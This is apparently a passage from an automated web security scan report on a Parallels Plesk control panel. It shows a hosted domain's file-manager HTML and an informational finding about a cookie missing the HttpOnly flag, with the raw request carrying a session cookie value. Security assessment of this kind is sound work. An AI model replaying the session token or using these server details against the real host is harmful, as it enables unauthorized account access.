onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fcgi-bin" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_error_docs" value="error_docs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Ferror_docs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Ferror_docs%2F" onClick=";lon();">error_docs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=error_docs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Ferror_docs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_httpdocs" value="httpdocs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=httpdocs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_httpsdocs" value="httpsdocs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpsdocs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpsdocs%2F" onClick=";lon();">httpsdocs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=httpsdocs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpsdocs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_private" value="private" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fprivate%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fprivate%2F" onClick=";lon();">private</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=private" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fprivate" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_statistics" value="statistics" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fstatistics%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fstatistics%2F" onClick=";lon();">statistics</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=statistics" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fstatistics" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_subdomains" value="subdomains" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fsubdomains%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fsubdomains%2F" onClick=";lon();">subdomains</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=subdomains" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fsubdomains" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_vault_scripts" value="vault_scripts" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fvault_scripts%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fvault_scripts%2F" onClick=";lon();">vault_scripts</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=vault_scripts" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fvault_scripts" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_web_users" value="web_users" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fweb_users%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fweb_users%2F" onClick=";lon();">web_users</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=web_users" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fweb_users" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_.Security" value=".Security" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=.Security" onClick="return bin();;lon();">.Security</a></td><td class="number">24.1&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=.Security" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2F.Security" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=.Security" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>11 <A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/rename/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.27. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/view/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/view/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:58:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:58:37 GMT
Connection: close
Content-Length: 14922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Operation failed</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {
hideinfo_oC(document.forms[0]);
$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/unhandlederror/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function update_oC(f)
       {
           f.cmd.value="update";
           f.submit();
           return false;
       }
       function showinfo_oC(f)
       {
